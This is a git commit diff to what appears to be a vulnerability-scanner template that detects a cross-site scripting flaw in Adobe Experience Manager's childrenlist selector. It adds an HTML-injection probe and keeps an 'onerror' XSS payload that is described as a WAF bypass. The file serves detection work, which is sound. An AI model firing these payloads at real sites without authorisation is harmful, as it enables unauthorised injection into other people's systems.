added waf bypass html payload

2023-01-16 13:37:20 +05:30 · 2023-01-16 13:37:20 +05:30 · f38ee97a34
parent 33266ab033
commit f38ee97a34
1 changed files with 10 additions and 4 deletions
--- a/misconfiguration/aem/aem-childrenlist-xss.yaml
+++ b/misconfiguration/aem/aem-childrenlist-xss.yaml
@ -1,7 +1,7 @@
 id: aem-xss-childlist

 info:
-  name: Adobe Experience Manager - Childlist selector Cross-Site Scripting
+  name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
  author: theabhinavgaur
  severity: medium
  description: |
@ -17,7 +17,8 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
+      - "{{BaseURL}}/test<br><br>please%20authenticate<br><br>.childrenlist.html"
+      - "{{BaseURL}}/test<img src=x data'a'onerror=alert(domain)>.childrenlist.html"

    matchers-condition: and
    matchers:
@ -25,8 +26,13 @@ requests:
        part: body
        words:
          - '<img src="x" data onerror="alert(domain)"/>'
+          - '<br /><br />please authenticate<br /><br />'
+        condition: or
+
+      - type: word
+        part: body
+        words:
          - 'data-coral-columnview-id'
-        condition: and

      - type: word
        part: content_type
@ -35,4 +41,4 @@ requests:

      - type: status
        status:
-          - 200
+          - 200